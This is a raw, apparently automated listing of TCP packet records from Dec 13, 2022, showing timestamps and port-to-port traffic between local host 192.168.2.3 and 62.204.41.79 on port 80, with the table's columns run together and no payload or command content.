                                              Dec 13, 2022 20:09:14.146235943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.146353960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.146471977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.146604061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.146739960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.146894932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.146994114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.147113085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.147232056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.147345066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.147665024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.147685051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.147862911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.147897005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.148205996 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.148602009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.148763895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.148900986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.148900986 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.148977995 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149077892 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149099112 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149118900 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149138927 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149139881 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149163008 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149182081 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149188995 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149202108 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149220943 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149245024 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149255991 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149275064 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149279118 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149302959 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149311066 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149316072 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149328947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149348974 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149365902 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149378061 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149414062 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149419069 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149439096 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149456978 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149458885 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149477959 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149485111 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149503946 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149519920 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149553061 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149574041 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149596930 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149614096 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149791956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.149928093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.149987936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.150012970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.150103092 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.150262117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.150340080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.150340080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.150481939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.150505066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.150605917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.150621891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.150922060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.150939941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.151151896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.151221991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.151253939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.151384115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.151482105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.151503086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.151618958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.151660919 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.151907921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.152029991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.152307987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.152383089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.152626038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.155900955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.156028986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.156136036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.156263113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.156388998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.156505108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.156517029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.156647921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.156754017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.156871080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.156894922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.156944036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.157037973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.157105923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.157388926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.157964945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.157982111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.158149004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.158449888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.158505917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.158683062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.158795118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.159989119 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.160172939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.160327911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.161137104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.161473036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.161670923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.161701918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.161844015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.161993980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.162039042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.162396908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.162463903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.162493944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.162669897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.162784100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.162867069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.162987947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.163110018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.163316965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.163427114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.163635969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.163650990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.163870096 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.164155006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.164266109 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.164352894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.164546967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.164594889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.164663076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.164865971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.164944887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.165654898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.165671110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.165684938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.165699005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.165740967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.165755033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.165827990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.166201115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.166220903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.166306973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.166467905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.166599989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.166616917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.166682005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.166856050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.166990995 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.167109013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.167226076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.167331934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.167465925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.167542934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.167646885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.167882919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.168040991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.168140888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.168438911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.168570042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.168899059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169014931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169110060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169204950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169302940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169399023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169493914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169586897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169680119 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169773102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169863939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.169955015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.170058966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.170145035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.170238972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.170331001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.170424938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.170531988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.170687914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.170806885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.170909882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171009064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171101093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171190977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171291113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171387911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171423912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.171471119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.171499968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171595097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171686888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171710968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.171822071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.171863079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.172009945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.172167063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.172286034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.172393084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.172482014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.172578096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.172668934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.172764063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.172772884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.172790051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.172838926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.172871113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.172914028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.172914982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.173017025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.173027992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.173151016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.173193932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.173305988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.173429012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.173468113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.173470974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.173638105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.173731089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.174263000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174293041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174308062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174320936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174335003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174350977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174362898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174595118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174627066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174707890 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.174900055 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.175127029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.175192118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.175318003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.175345898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.175522089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.175668955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.175751925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.175932884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.176032066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.176157951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.176253080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.176397085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.176443100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.176523924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.176651955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.176743031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.176762104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.176784992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.176906109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.177036047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.177051067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.177068949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.177154064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.177164078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.177268982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.177401066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.177521944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.177611113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.177637100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.177647114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.177669048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.177752972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.177769899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.177788019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.177882910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.177948952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.177994967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.178128958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.178251982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.178359032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.178385973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.178518057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.178630114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.179020882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.179160118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.179296970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.179406881 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.179546118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.179702044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.179853916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.180005074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.180164099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.180320024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.180471897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.180625916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.180787086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.180938959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.181098938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.181252956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.181417942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.181567907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.181713104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.181880951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.182041883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.182075024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.182097912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.182199955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.182286024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.182301998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.182364941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.182399035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.182524920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.182553053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.182673931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.182758093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.182837963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.182985067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.183175087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.183357954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.183521986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.183715105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.183926105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.184088945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.184262037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.185720921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.185741901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.185856104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.186001062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.186031103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.186199903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.186289072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.186316013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.186475992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.186495066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.186595917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.186644077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.186671972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.186777115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.186887026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.186903954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.186996937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.187036991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.187118053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.187150955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.187177896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.187304974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.187324047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.187433958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.187474966 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.187505960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.187558889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.187685013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.187725067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.187800884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.187810898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.187889099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.187936068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.188060045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.188081980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.188153982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.188193083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.188317060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.188327074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.188456059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.188514948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.188550949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.188580990 CET4973680192.168.2.362.204.41.79
